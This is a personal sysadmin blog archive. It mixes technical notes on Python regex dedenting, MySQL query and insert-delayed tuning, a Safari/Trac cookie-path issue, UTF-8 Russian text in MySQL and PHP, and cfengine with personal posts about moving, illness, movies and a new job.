Every now and then I come across some really nifty Python code. Terseness is really not a good virtue of Python code, but I just thought this snippet was very clever. It comes from a really nice online book called Text Processing in Python. The problem deals with flushing a code block to the left, keeping all other indentation the same. In other words, this:
   if blah:
      print 'hi'
gets changed to:
if blah:
   print 'hi'
Simple enough huh? Here is their solution:
from re import findall, sub
from functools import reduce  # reduce() is a builtin only in Python 2

# What is the minimum line indentation of a block?
indent = lambda s: reduce(min, map(len,
                   findall(r'(?m)^ *(?=\S)', s)))
# Remove the block-minimum indentation from each line?
flush_left = lambda s: sub('(?m)^ {%d}' % indent(s), '', s)
lambdas are small one-line functions in Python. This text talks a lot about 'higher-order functions' which are basically function generators, and they make extensive use of lambdas. The above creates 2 functions stored in the variables indent and flush_left. flush_left would be called on the text to be processed.
First let's look at 'indent'. Essentially this function is trying to determine the minimum line indentation of a block to remove. It would result in 3 for my example. It's kinda confusing unless you break it down. findall is the innermost function, and it finds all regular expression matches for:
(?m)^ *(?=\S)
The '(?m)' is adding the multiline option to this regexp, so that it would span multiple lines. Then the regexp looks for 1 or more spaces at the beginning of a line given a lookahead assertion that there is a non-whitespace character right after the last space. Whew. So this will return a bunch of strings with some number of spaces.
Next is the call to map(). This function applies a certain function (in this case len()) to a list and returns that list. So the result of the map() call is a list of numbers which are the lengths of leftmost whitespace.
The next call is reduce(), which applies a certain function to pairs of elements in a list, returning one result. Essentially it reduces. In this case it is applying min(), which returns the minimum value. So the final result is the smallest number of leftmost spaces. This whole operation is assigned a lambda function called indent() that takes one argument, the block of code being analyzed.
Next is the flush_left() function:
flush_left = lambda s: sub('(?m)^ {%d}' %
indent(s),'',s)
What does this do? Well it does a regexp substitution, replacing '%d' number of spaces at the beginning of a line with nothing. %d is calculated by the indent() function defined above, which is the minimum number of spaces to remove in order to flush everything to the left.
Pretty nifty, but hard to understand at first glance. I'm not sure if I'd ever write such code, but it is fun to analyze. Obviously this wouldn't work with tab-indentation, but a few modifications and it would.
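The tab-aware variant mentioned above, as an added example (not code from the book or the original post). It measures indentation in columns with an assumed tab size of 8 and skips whitespace-only lines. Note that ` *` also matches an empty run, so an unindented line contributes 0; `min_indent`, `MIXED` and `SPACES` are names made up for this sketch.

```python
import re
import textwrap
from functools import reduce

# The snippet from the page, kept for comparison (it only understands spaces).
orig_indent = lambda s: reduce(min, map(len, re.findall(r'(?m)^ *(?=\S)', s)))
orig_flush_left = lambda s: re.sub('(?m)^ {%d}' % orig_indent(s), '', s)


def min_indent(block, tabsize=8):
    """Smallest indentation, in columns, among lines that contain text."""
    widths = [len(m.group(0).expandtabs(tabsize))
              for m in re.finditer(r'(?m)^[ \t]*(?=\S)', block)]
    return min(widths) if widths else 0


def flush_left(block, tabsize=8):
    """Strip the common indentation from every line, counting tabs as columns."""
    n = min_indent(block, tabsize)
    out = []
    for line in block.splitlines(True):
        body = line.lstrip(' \t')
        if not body.strip():
            out.append(body)      # whitespace-only line: keep just the newline
            continue
        # Expand the leading whitespace so tabs and spaces are comparable.
        lead = line[:len(line) - len(body)].expandtabs(tabsize)
        out.append(lead[n:] + body)
    return ''.join(out)


# Constructed samples: MIXED has two tab-indented lines, a blank line and one
# line indented with 8 spaces; SPACES is the example from the post.
MIXED = "\tif blah:\n\t    print('hi')\n\n        done()\n"
SPACES = "   if blah:\n      print 'hi'\n"

if __name__ == "__main__":
    print(repr(orig_flush_left(MIXED)))   # only the space-indented line moves
    print(repr(textwrap.dedent(MIXED)))   # no common literal prefix: unchanged
    print(repr(flush_left(MIXED)))        # all lines shifted by 8 columns
```

On a block indented only with tabs the original lambda finds no matches at all, so `reduce()` raises `TypeError` on the empty sequence.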
The movers came out this week to take my stuff as well as my car. There were 3 moving guys and they did a pretty good job, considering I had relatively very little to move.
One of the movers had broken something on my screen door while taking a sofa out. I mentioned this to the lead mover and he says to me with a straight face, "I have a 45 in the truck." At first I was like, 45? What does he mean? I didn't know what he was talking about. Then he says, "If you want to aim, I can pull the trigger." At that point I realized ohhh, he's talking about a gun! Hehehe, well at least he had a sense of humor. I found out that he likes busting his coworkers' balls.
Anyway, they were able to fix the door gaffe, so no harm done. I'll be on my way Jan 2nd to the other side of the country.
I had a chance to see an episode from the first season of The Sopranos and realized how much anything after season 1 sucked. It was just so much more interesting back then. Now it's just a very silly soap opera. It seems like the writing completely changed. I wouldn't be surprised if it's now written by new authors.
Neat little Ajax real-time translator.
Ever wondered whether running in the rain helps reduce your wetness? Check out this analysis.
Recently I looked at a client webserver where there were lots of MySQL processes eating up quite a bit of CPU. It's a fairly high traffic site, however when I see mysqld processes staying at 80-90% for more than a few seconds, that tells me something is wrong. It's usually an indication that either they are using some very inefficient queries, do not have the proper indexes, or the tables are getting too large.
So let's see how to debug this. First thing is by the looks of the processes, there must be 1 or 2 queries that are pegging the CPU, and we need to find out what queries are taking long. I started up the mysql client and did a 'show status':
show status;
...
| Slow_queries | 12256 |
...
Hmm, lots of slow queries, but that number isn't increasing rapidly. I believe this shows very slow queries only. Next I did a 'show processlist' a few times until something showed up:
show processlist;
...
| 2721 | web | localhost | development | Query | 0 | Copying to tmp table | SELECT DISTINCT wheel.make FROM inventory LEFT JOIN wheel ON inventory.id=wheel.id WHERE status="act |
...
Usually, if you see a query on 'show processlist' consistently, that query is probably unoptimized and taking a long time. The above only showed me part of the query, and I needed to find the whole query to test it. Now I could go digging in the client's source code, but it would be a waste of time trying to find the culprit query. The best way is to enable MySQL logging. MySQL is such a lightweight DB, restarting it usually goes unnoticed even on high traffic webservers. I added to /etc/my.cnf:
[mysqld]
log=/var/log/mysqld/mysqld.log
And made sure to create that logfile writable by the mysql user (it won't log it if it doesn't have the right permissions). Next I find the query I'm looking for:
SELECT DISTINCT diameter FROM inventory LEFT JOIN wheel_fitment ON wheel_fitment.wheel=wheel.id LEFT JOIN wheel ON wheel_fitment.wheel=wheel.id WHERE status="active" AND vehicle=4566 AND price!=0 AND wheel_fitment.type="all" ORDER BY diameter
Ok, I'm not too familiar with the multiple left joins, but I do know what a join is. I run this query manually and it takes anywhere from 6 to 10 seconds to return results. That's definitely too long for a query to take, and the tables are not even that big! Now is when you try to take everything out of the query except the bare necessity that makes it slow. I ended up with:
SELECT DISTINCT diameter FROM inventory LEFT JOIN wheel ON wheel_fitment.wheel=wheel.id LEFT JOIN wheel_fitment ON wheel_fitment.wheel=wheel.id WHERE vehicle=4566
Now I needed to know something about these tables. As sysadmins, we usually come in the picture when something has gone wrong, and we really played no part in the development of the system we are diagnosing. I wanted to know whether there were indexes on the tables. I did 'show create table wheel' as well as wheel_fitment and inventory. They all seemed to have proper indexes on the fields being used in the query. Hm what next? Well the double 'LEFT JOINs' looked kinda weird to me, they are just swapped. The resulting set if I take out the 'DISTINCT' is something like 250k rows, much larger than all of the tables combined. Clearly something is weird.
I checked the mysql join docs for some help, and determined that the following provides the same results:
SELECT DISTINCT diameter FROM inventory LEFT JOIN (wheel, wheel_fitment) ON (wheel_fitment.wheel=wheel.id) WHERE vehicle=4566
Only now the query takes less than .3 seconds, quite an improvement from 10 seconds! My guess is that MySQL is better able to optimize the latter query.
Wonder what it's like to win the lottery? Well here's a very mean prank played on someone.
Here's a cool video of a camera strapped onto a rocket.
A prayer:
Another year is dawning
With the chance to start anew.
May I be kinder, wiser, Lord,
In all I say and do,

Not so caught up in selfish gain.
That I would fail to see
The things in life that mean the most
Cost not a fancy fee.

The warm, kind word that I can give,
The outstretched hand to help,
The prayers I pray for those in need --
More precious these than wealth.

I know not what may lie ahead
Of laughter or of tears;
I only need to know each day
That You are walking near.

I'm thankful for this brand new year
As now I humbly pray,
My hand secure in Yours, dear Lord,
Each step along the way.

- by Kay Hoffman
Just heard this Dutch band's music on an IFC video. Very cool, check out the 'Human' video.
This is an interesting video about time management for sysadmins. A lot of it may be common sense, but there are some useful tips and it is presented well.
Here's a cool little small form factor PC that comes bundled with Ubuntu Linux. Great if you just want to setup a simple hassle-free desktop PC for someone.
Well for the past 4 days I've been very sick. Not sure what I have, but it is an intense and burning sore throat and fever, like nothing I've ever had before. The cough is extremely painful and the first few days I was on the brink of passing out due to the pain. I think I've coughed up at least a gallon of phlegm by now. I've started antibiotics, which I absolutely loathe taking. They make me feel even more like crap, and I have to take them for 5+ days. My fever seems to be gone now which I suppose is a good sign.
This morning I had some sort of coughing fit where I could not for the life of me stop coughing. A minute more of that and I would've had to go to the ER.
Here's an interesting article on Google hiring.
You gotta love interspecies love.
I'm one of the 2 on this earth that doesn't like Lord of the Rings. I believe I am missing the LOTR gene or something. I just can't get into that fantasyland crap, much less 4 hours of it. So naturally I wasn't a big fan of Peter Jackson or knew much of his capabilities. After seeing King Kong, I have much more respect for him. This movie is absolutely amazing, and is truly what a movie should be.
Indian (i.e. Bollywood) movies are known for their length and breadth in the number of emotions they try to eke out of the audience. It's hard for an American viewer to understand them, because the transition between emotions in scenes is so abrupt that it's almost cartoonish. When a movie can span every emotion and smoothly transition between them, that's real directorial skill. That's what King Kong does.
It's 3 hours long, but honestly it didn't feel long at all. That's again a director's skill in keeping the audience enthralled. I was reminded of the Indiana Jones movies, E.T., Close Encounters, and others that just captivated you. This movie's action sequences actually made me sweat in my seat. It's said this was Peter Jackson's labor of love, and it really shows.
It's really amazing how much science and our understanding of animals, especially apes, have contributed to this film. There is probably a stark difference just in this realm from the older version of the movie. When we see Kong and Naomi interacting in many scenes, we understand that Kong sees beauty in her, and is essentially trying to impress her. He goes through the animalistic alpha-male rituals to show his strength. He wants to possess her, and when she is taken away he gains enormous strength to get her back. It's as if he is unstoppable in his goal. I honestly thought of how much the mind can affect the body. That's love for you. Are humans really much different? We do the same things, but just in different ways. Sure we are less primitive, but that's only relatively speaking.
I noticed throughout the movie a connection between ape and human, almost as if Jackson is trying to show Darwin's thoughts. You can see in Kong's face and actions a struggle to reach humanity, and the end result proves this. You realize just how alone this so-called monster really is, and how much he struggles to find love. In the end he realizes the gap is too wide. But he gained the love he was searching for.
If I have any gripes, it has to do with what looks like actors in front of a blue screen. Don't get me wrong, the effects are amazing, but there are certain scenes where the physics just doesn't seem right. Another issue I had was during the dinosaur fight scene. I just couldn't imagine dinosaurs going through so much trouble for a meager piece of meat that is Naomi Watts. I mean she's hot and all, but come on...
I was not sure what to expect with Jack Black seriously acting. I was pleasantly surprised because he did really well.
Here are some pictures I took of apartments in Mountain View, CA. I picked Avalon at Creekside which seemed a good price.
I went out to dinner with some friends and we decided to change a low tire on a BMW 325. Sounds simple right? Well first of all they have this weird contraption to jack the car and alter the space-time continuum. Once that was figured out, we lifted the car and took all the bolts out, but the wheel would not budge. After a ring to BMW, they said to kick it a few times. We threw some really hard kicks at it but still no budge.
Then we took the emergency brake off. Not a good idea. The car fell off the jack and the wheel came off due to the pressure. Luckily the wheel stayed on and the axle didn't hit the ground. We raised it again and put the new tire back on. Afterwards, the towing service came by and explained how to change a BMW tire. He said to first loosen the lugnuts a bit while the car is on the ground, then drive and slam the brakes a few times. This loosens the wheel. After that, jack the car up and take out the wheel. Hmm, who could possibly figure this out? The manual says nothing about it.
Just some advice on how to change a tire on your ultimate driving machine. But if you're driving one you may as well call for service than do it yourself.
Some of you may already know this, but I have accepted a position of Cluster System Administrator at Google. This was a difficult choice for me due to my past decision to go back to school. However, I think this is a great opportunity and has honestly always been a dream job for me.
I'm in Mountain View, CA now looking for apartments. The rent is definitely up there compared to Florida, but I found a fairly reasonable one that is right next to a bike trail that goes about 2.8 miles to Google. I would really like to bike to work. That would be sweet. I took a walk down the trail and it took me about 1 hour, so I expect a bike to take 20 min or so. I actually walked by Counterpane's office, and thought about all of the Bruce Schneier books I have.
Anyhow, I'll post more as things move forward.
Here is a great website with some workouts you can do without weights. If you do them right, even just workout 1 will leave you sore for a few days. The main thing is keeping the correct posture for all exercises. Trying to do those 'hindu' squats keeping your knees behind your toes is next to impossible if you are not in shape. The 'pyramid' reps are also a killer.
I came across Meebo, which is a web-based IM client. It's a rather amazing AJAX application. Check it out.
Well I came across MySQL's default 4gb limit today. I have Apache logging via mod_log_sql and the tables are growing very fast. Just a week's worth of data hits 4gb.
When I think of a database limiting you to a 4gb table I think huh? It just doesn't make much sense to me, and makes me want to use PostgreSQL instead. Sure I can do all this alter table stuff to get it larger than 4gb, but why default it to such a low value in the first place? What's worse, comments from users claim such an alter table can lose records.
Gee, that's great.
I read an interesting article in the latest Linux Journal about someone who used a Linksys NSLU2 file server, installed a Linux firmware on it, and created an iTunes streaming music server. He was able to use this small device to replace a full-blown PC for serving music.
The NSLU2 is a small nifty device with 2 USB ports and an Ethernet port. You hook up USB (v2) hard drives to it, and it has a web-based administrative interface to share out the disks via Samba. Once people were able to install Linux on it, all sorts of cool applications came forth.
But I have another cool idea for such a setup. Think about getting a bunch of these Linksys devices, a bunch of USB drives, and creating a cheap clustered file server. Something that could aggregate the storage of many of these units, and possibly provide some way to easily add or remove nodes on the fly. It would be cool if there was some sort of redundancy or failover as well if a node went down.
A 'node' in this case refers to the Linksys device. On each we could connect 2 hard drives, and then use software RAID 1 to mirror them. This would give us redundant data on one node. Now we would need something to consolidate all of these nodes into one mass storage. There are a few clustering filesystems that I've done some reading on.
Probably the simplest setup is to use (E)NBD, or network block device. This allows a Linux system to 'share' out local devices over the network to be mapped on another system. The local 'device' in this case would be our RAID 1 virtual device. The system that would map these NBDs could be another Linksys node that aggregates them into a RAID 0 device. On that same node we'd run Samba or some other filesharing system. It sounds like a homebrew implementation of Coraid.
This will handle single drive failures, but the problem is if one node goes down, that makes one unit of the RAID 0 inaccessible, and the RAID 0 will fail completely. One option is to use RAID 0 striping on the local node with 2 drives. Then the fileserving node would RAID 1 each pair of nodes, and finally RAID 0 stripe over the pairs. I guess this would be termed a RAID 0+1+0 setup. That might be overkill for a home setup where you can tolerate a bit of downtime to replace a node (at least your data is still safe).
There is another driver called ddraid, but I'm not exactly sure how this would differ from an NBD RAID, and it is documented poorly.
An alternative to NBD is using a clustering filesystem. There are a few for Linux, but many seem to target big-spenders, and have high learning curves and jargon. The most simple and straightforward ones I found were Lustre and PVFS2. I like PVFS2 because its documentation is easy to follow. It seems to provide easy aggregation of data storage on nodes, allowing addition and removal. It seems to create a virtual directory that is just the aggregate of all nodes. It does not provide redundancy on its own, but using software RAID and failover tools it is possible. I'm a bit confused as to how it handles low disk space issues though.
Using RAID 0, I don't believe it would be easy to add more storage as you go. Maybe just using RAID 1 on the nodes, and then aggregating them with NBD and LVM would be enough. LVM would let us grow the filesystem as we added more nodes, and the mirroring saves in case of 1 drive failure.
I think creating a farm of slugs, as these Linksys units are referred to, would be a very cool home project to work on. I hope I can get some time.
There's a good article by Nat Friedman at the end of this month's Linux Journal. A quote:
There's a difference between software that is usable and software that is a pleasure to use. Until you watch people using your software, it's hard to know how well you're doing.
I remember reading in Discover magazine about some company trying to design technology to analyze commonalities in a music database and predict what a person will like. I don't know if this is from the same company, but Pandora seems awfully close to achieving this.
A friend pointed it out to me and I think I'm already hooked. Normally I listen to Shoutcast streams, which was rather difficult to find consistent music that I liked on any station. Pandora seems to generate personally tailored stations. I wonder how they are achieving this, because I can imagine it requires quite a bit of bandwidth to play so many streams, growing linearly with the number of users. I wonder if these seemingly unique streams are actually shared among many listeners.
Regardless of how they do it, it's very cool. It has consistently predicted music that I like. I don't think I'll be listening to Shoutcast streams anymore, for popular music at least. I'm not sure if I can get any drums and bass from Pandora.
Here is an interesting view of how many Indians educated in India think of free software. I myself am Indian but I was born and raised in the US. I agree with the article that the university systems in India probably do not encourage creativity, but rather focus on employment.
However I think for a person to be interested in free software, they have to have a certain mindset created very early, perhaps much before college. I think the reason I became interested in OSS was not because of school, in fact I did most 'hacking' outside of school. I saw the benefits of OSS and its results, because every bit of 'hacking' or learning I did was dependent on OSS. I needed to have Linux on my system to learn Unix. I needed GCC to learn C, etc. These tools were there and I didn't need to spend money to gain the knowledge on how to use them. I saw that in general OSS seemed to work better than closed source in many cases, and that I could get better support from one lone developer than an army of help desk personnel in a commercial product's support department.
I also worked in the computer science department as a sysadmin, and doing so forced me look for solutions to problems with little budget. It also allowed me to change software to work the way I needed it to. It's one thing to know that the source is there and you can change it, but it's different when you actually do change it. You become much more entwined in OSS, and you realize the true power of it. You realize that this could never have been done if you used a closed source product. All of this contributed to how much I value OSS.
For someone to gain interest in becoming an OSS developer, you need to see all of these things and realize that you want to be part of it as well.

During the middle of the twentieth century, this rather drastic procedure, called prefrontal lobotomy, was used to "cure" a variety of mental illnesses, especially those associated with violent or antisocial behavior. After a lobotomy, the patient would no longer be concerned about what had previously been a major problem, whether psychological (hallucinations) or physical (severe pain). However, the individual was often equally unconcerned about tact, decorum, and toilet training.
A reader sent in this interesting lobotomy story.
So I'm sitting here studying for exams and thinking to myself: How does it benefit me to know that a pearl fish lives inside the anus of a sea cucumber?
Is it me, or is Sourceforge getting extremely ugly and impossible to navigate? The place is filled with tons of ads and dumb Yahoo search results everywhere. What's worse is the ads and unrelated stuff looks exactly the same as the rest of the page and it is hard to delineate ads from useful content. I guess that is their goal. For some reason, whenever I go to Sourceforge it feels like I gain 20 pounds.
I think I found a bug in how Safari 1.3.1 is handling cookies.
I've setup Trac, which is a nice Python wiki/bugtracker for a client. There are multiple projects setup, and each has its own authentication via htpasswd. The problem I'm having is when I login to one project, I can't login to the other project without logging out of the previous project. I described the problem fully on this bug posting.
Trac uses a trac_auth cookie to keep track of authentication. It has a specified path associated with it, so it's perfectly ok to have multiple trac_auth cookies for the same site and separate authentications for each. But this is simply not working with Safari. Firefox works fine with this. I have 2 projects setup, one with path /projects/splash and another with path /projects/splash_old. I started looking at some tcpdumps to see what Safari is sending. I noticed that when I tried logging into the 2nd project after logging into the 1st one, Safari sent:
Cookie: trac_auth=36b8db01607d7ab36506ad97d38196b3; trac_auth=eb167bd6b57b7a5dae9a3dee48ef13b2
Note the 2 cookies with the same name. There is only one cookie that is supposed to be associated with the path I'm going to (/projects/splash_old) so I don't understand how it could send 2. The cookie specification states that a client may send multiple values of the same cookie if the cookies are part of a parent path. But /projects/splash is not the parent of /projects/splash_old. Or am I missing something? It seems Safari is incorrectly making this assumption.
Looking at a tcpdump of Firefox shows it only sending one trac_auth cookie for the 2nd project and it works fine. Firefox also correctly shows 2 trac_auth cookies in the cookie browser, one associated with each path (/projects/splash and /projects/splash_old), whereas in Safari I could only see one.
Update: I created some simple scripts to reproduce this. Go to this page which will set 2 cookies. One cookie will be for test.php and another for test.php_notpath.php. Clearly the second php script is not a child of the first one. If you follow the link, you should see HTTP_COOKIE only having one value for SafariCookieBug because the resulting page is not a child page. That's how Firefox behaves, but Safari 1.3.1 shows 2 values.
Update: Well I found out that IE behaves like Safari. So maybe this is not a bug after all.
Update: Deeper into the rabbit hole I go. It turns out Trac uses the Python Cookie module, which doesn't have support for multiple cookies with the same name. It uses a dictionary to store the data. I'll probably make some changes to Trac to get it working, but I submitted a Python bug report.
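An added example (not from the original post, and not Trac's code) covering both the path question and the dictionary problem described above. It compares plain prefix matching with the segment-aware path-match rule of RFC 6265 section 5.1.4, which postdates this post, and then shows a server-side parse that keeps every same-name value. The jar-to-path mapping, the session table and all function names are assumptions made for the sketch.

```python
from http.cookies import SimpleCookie

# Cookie header captured on the page (request to /projects/splash_old).
HEADER = ("trac_auth=36b8db01607d7ab36506ad97d38196b3; "
          "trac_auth=eb167bd6b57b7a5dae9a3dee48ef13b2")

# Constructed jar: which value belongs to which project is an assumption.
JAR = [
    ("/projects/splash", "trac_auth", "eb167bd6b57b7a5dae9a3dee48ef13b2"),
    ("/projects/splash_old", "trac_auth", "36b8db01607d7ab36506ad97d38196b3"),
]
# Constructed session table of the splash_old project.
SESSIONS = {"36b8db01607d7ab36506ad97d38196b3": "alice"}


def prefix_match(cookie_path, request_path):
    """Plain string prefix: the Netscape cookie spec lets /foo match /foobar."""
    return request_path.startswith(cookie_path)


def rfc6265_path_match(cookie_path, request_path):
    """Segment-aware rule: the prefix must end at a '/' boundary."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def cookie_header(jar, request_path, match):
    """Build the Cookie header a client would send, longest path first."""
    sent = [(path, "%s=%s" % (name, value))
            for path, name, value in jar if match(path, request_path)]
    sent.sort(key=lambda item: -len(item[0]))
    return "; ".join(pair for _, pair in sent)


def kept_by_simplecookie(header, name="trac_auth"):
    """SimpleCookie is a dict, so only one value per name survives parsing."""
    return SimpleCookie(header)[name].value


def all_values(header, name):
    """Every value sent for `name`, in header order."""
    values = []
    for pair in header.split(";"):
        key, sep, value = pair.strip().partition("=")
        if sep and key == name:
            values.append(value)
    return values


def authenticate(header, sessions, name="trac_auth"):
    """Return the user of the first candidate that is a known session."""
    for value in all_values(header, name):
        if value in sessions:
            return sessions[value]
    return None


if __name__ == "__main__":
    print(cookie_header(JAR, "/projects/splash_old", prefix_match))
    print(cookie_header(JAR, "/projects/splash_old", rfc6265_path_match))
    print(kept_by_simplecookie(HEADER), authenticate(HEADER, SESSIONS))
```

Each candidate is only accepted after a lookup in the project's own session table, so accepting several values does not widen what a client can authenticate as. Giving each project a distinct cookie name avoids the collision altogether.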
I'm not a very lingual guy. So when I got a request to see how to store and display Russian characters with MySQL and PHP, I didn't really know too much about it. So began my research.
First of all I was told there was some table that had Russian data in it. When I did a select on it I would get something like:
mysql> select * from polls;
...
| 11 | ??? ???????? ?????? ?????????? ????????????? | NULL |
Ok, that's reasonable. The mysql client must not know how to display it. But how can I be sure those are actually Russian characters and not actually question marks? If the user never got Russian working, can we be sure there is actually Russian data in there? I wanted to see the true values in there, and came across the ascii() mysql function which gives the ascii value of the first character of a string.
mysql> select ascii(question) from polls;
...
| 63 |
Hmm, 63 is actually the ascii value for a question mark. So I cannot depend on this data. Next task is creating a table and populating it with Russian data. After some searching, I found that I needed to specify the column character set.
create table polls2 ( id int(11) not null auto_increment, question text character set utf8, lang varchar(10) default null, primary key (id));
Ok great, now how do I enter data? I don't know Russian, nor how to type it. Luckily, I did have some Russian spam on hand, and succeeded in cutting and pasting it. But before I could insert, I had to change my mysql command line connection character set:
set names 'utf8';
insert into polls2 (question) values ('some pasted russian stuff');
That looked like it populated the table ok, and in my OS X terminal I can even see the characters (but they look ugly). I wrote (or rather, stole) some PHP code to query the DB and display it, but was just ending up with junk in the browser. After much searching, I found that a header must be added to the HTML:
... meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf8" (sorry can't put the brackets here)
Ok, but it still didn't work. I'm starting to dislike these Russians. I then went to Gmail with the Russian spam, and looked at the HTML source of the email displayed in the browser. I saved it, and then copied the html file to the server I was working on. I went to retrieve the file from my server, and whaddaya know it's showing junk characters again. So clearly it wasn't any incorrect data in MySQL or displaying it with PHP on my part. There must be something else going on. It's as if the META HTTP-EQUIV headers specifying language are being ignored.
So I ran wget to show me the headers:
wget -q --save-headers -O - my.site.com/russian.spam.html
And then noticed that the server was sending:
Content-Type: text/html; charset=iso-8859-1
Clearly overriding whatever I put in the html headers. I then found there was an AddDefaultCharset in the Apache config which is the culprit. I didn't want to really change that, and instead created an .htaccess with:
AddDefaultCharset Off
Now, after doing all this, I can finally see the Russian characters in the browser, retrieved from MySQL, and displayed with PHP:

Maybe these notes will be helpful to some poor soul.
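The two failure modes in these notes, as an added example (not the PHP or MySQL code from the post). It shows a lossy conversion that leaves literal question marks (byte 63) in storage, and an HTTP Content-Type header overriding the page's own meta tag. The sample text, the HTML page and the function names are constructed for illustration.

```python
import re

RUSSIAN = "Привет, мир"   # constructed sample text, not the page's data

# Constructed UTF-8 page carrying the meta tag quoted in the post.
PAGE = ('<html><head><meta http-equiv="Content-Type" '
        'content="text/html; charset=utf8"></head><body>'
        + RUSSIAN + '</body></html>').encode("utf-8")


def store_in_latin1_column(text):
    """Lossy conversion: characters latin1 cannot hold become '?' (byte 63)."""
    return text.encode("latin-1", errors="replace")


def effective_charset(content_type_header, html_bytes):
    """Charset a browser applies: the HTTP header wins over <meta http-equiv>."""
    m = re.search(r'charset=([\w-]+)', content_type_header or "", re.I)
    if m:
        return m.group(1).lower()
    m = re.search(rb'<meta[^>]+charset=["\']?([\w-]+)', html_bytes, re.I)
    return m.group(1).decode("ascii").lower() if m else None


def render(content_type_header, html_bytes):
    """Decode the body the way the effective charset dictates."""
    charset = effective_charset(content_type_header, html_bytes) or "iso-8859-1"
    return html_bytes.decode(charset, errors="replace")


def recover_mojibake(text):
    """Mis-decoded UTF-8 is reversible because the original bytes are intact."""
    return text.encode("iso-8859-1").decode("utf-8")


if __name__ == "__main__":
    print(store_in_latin1_column(RUSSIAN))                    # question marks
    print(render("text/html; charset=iso-8859-1", PAGE))      # junk characters
    print(render("text/html", PAGE))                          # readable text
```

Junk characters in the browser mean the bytes survived and only the label is wrong; stored question marks mean the text was already replaced before it reached the table.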
A friend of mine posted a blog about read() calls and the maximum amount you can read. It got me interested too, so I did some tests as well.
First of all, I notice the read() manpage states (man 2 read):
If count is zero, read() returns zero and has no other results. If count is greater than SSIZE_MAX, the result is unspecified.
SSIZE_MAX on my Linux system is 2gig, or 2^31. I cannot read more than that. In fact, the largest buffer I can malloc is about 2934062847. Both malloc() and read() take types of size_t, type unsigned long, which is 4gig, or 2^32. But it seems read() cannot read more than 2^31. Hm, I know I can't use values greater than 2^32 on 32-bit systems, but I would expect read() to do up to 2^32 and not only 2^31.
Here is a great site that combines Google Maps with Craig's List to provide apartment/home locations.
I recently got a message from a client that said whenever he added groups to a server, they would disappear.
Now this is what I call a system reacting to change. It gives me no surprises. If someone tries to change something I specifically don't want them to change, those changes are eventually discarded. In this case it was /etc/group being checksummed to a copy on the cfengine distribution server, and when the change was found, it simply put back in the original version. Same goes for passwd, shadow, and other important files. This even provides some security to the box, and makes the system look like it's a live organism.
There are many cases where someone goes into the system and breaks something. A tool like cfengine can be used to provide some armor on the system, with some ability for self-correction. Of course someone can just go to the cfengine server and screw up the distribution files there, but that requires some more conscious effort.
It's impossible to code for every possible damage that can be done to a system, but you can think about the major problems and counter those, which is better than nothing. Here is another of my questions on the mailing list. I started a small war, but it's pretty cool to get responses from computer science professors.
Since implementing mod_log_sql for a client, I've come across some interesting issues that required a bit of MySQL tuning.
The way mod_log_sql works is each Apache process makes a connection to the MySQL server. This means the MySQL server must be able to theoretically support n * MaxClients connections where n is the number of webservers. In my case, that value turns out to be 2048. That's a lot of connections! The default limit is 100. MySQL 4+ supports setting these sort of variables without restarting the server with a command such as:
set global max_connections=2048;
The other thing I am sure would be required is MySQL's INSERT DELAYED feature. This allows inserts to occur while the table is locked by another process. MySQL does not provide row-level locking on MyISAM tables. I envision the users using these apache log tables quite a bit, and didn't want that to slow down inserts. I had used insert delayed in the past in a spam filter I wrote for CommuniGate Pro. Insert delayed is still a work in progress in the version of mod_log_sql I'm using, so I ended up going to the C code and changing the inserts to 'insert delayed' syntax and recompiling.
When I did the above changes I thought it would be the end of the story. Then came the next problem. The tables are growing fairly large, about 3 gigs a week. This is much more than text logs because text logs are usually compressed. So I had to set up some sort of archival scheme. I was testing some pruning SQL statements. The tables don't have indexes, and certain queries were taking minutes. I thought, that's ok, because I'm using insert delayed. Soon, I started noticing the webservers reporting the following whenever I was working on the tables:
[Sat Nov 12 10:04:46 2005] [error] mod_log_sql_mysql: database connection error: mysql error: Too many connections
[Sat Nov 12 10:04:46 2005] [error] mod_log_sql: child spawned but unable to open database link
Huh? How could locking the table cause >2048 connections attempting to be made? This could be a bad design of mod_log_sql, but I thought there has to be some other issue underlying the problem. I did a:
show variables like '%delayed%';
Which showed:
| delayed_insert_limit       | 100 |
| delayed_insert_timeout     | 300 |
| delayed_queue_size         | 100 |
| max_delayed_threads        | 20  |
| max_insert_delayed_threads | 20  |
Hmm, not knowing what these actually do and not finding too much documentation on them I tried increasing delayed_insert_limit, but that didn't do anything and I still got the connection errors. Then I thought, let me try reproducing the problem by locking the table and watching the output of 'show status' for any clues in the 'delayed' variables. So in one window I did:
lock tables access_table read;
And in another I did:
mysql> show status like '%delay%';
+--------------------------+----------+
| Variable_name            | Value    |
+--------------------------+----------+
| Delayed_errors           | 0        |
| Delayed_insert_threads   | 6        |
| Delayed_writes           | 15583200 |
| Not_flushed_delayed_rows | 5        |
+--------------------------+----------+
4 rows in set (0.00 sec)
I did this a few times and noticed Not_flushed_delayed_rows increasing rapidly, which makes sense since I locked the table and insert delayed queries were being queued. As soon as it got to 100, Apache was reporting the connection errors. That clearly told me 100 was a limit somewhere. It wasn't delayed_insert_limit since I tried increasing that already, so I tried increasing delayed_queue_size. That was it. 'queue' should have pointed that out to me. I changed it to a much larger value (10000) and everything seems smooth now.
These can be set in /etc/my.cnf with lines like:
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
set-variable=max_connections=2048
set-variable=delayed_queue_size=10000
I was reading about a study on emotions. There was an experiment done with people who had gone through some sort of trauma that made them emotionless. These were people that were at the ultimate calm. Nothing could upset them or make them sad, and also nothing could make them happy. They simply had no emotional states, and did not have these feelings.
What the scientists found out is that these people have trouble making decisions. Whenever they were given simple questions, where they had to choose between many equally valid answers, they could not do it. They would basically be stuck in an 'indecision' mode, and nothing would tip them over to make a choice.
The scientists claimed that emotions are what tips us over to one side, and causes us to make decisions. I thought this was really fascinating. You always hear that you should be calm when making decisions and such, but really if you are completely calm (the ultimate calm) you will not make any decisions. So there has to be some emotion there to push you. It's like being on a fence, or stuck in some race condition or infinite loop.
So when you get emotional keep in mind it's not entirely a bad thing.
I set up a load-balanced Apache setup to log its access log to MySQL with mod_log_sql. This module works nicely. Check it out.
Well, after doing a lot of work with cfengine, I've come to the realization that the convergence methodology of system administration is the best one. That means many systems slowly converging to a desired setup, and staying that way.
One of the major hassles with sysadmin is making sure servers that should be identical, are actually identical. In terms of software and libraries installed, processes running or not, etc, any sort of divergence is usually a problem.
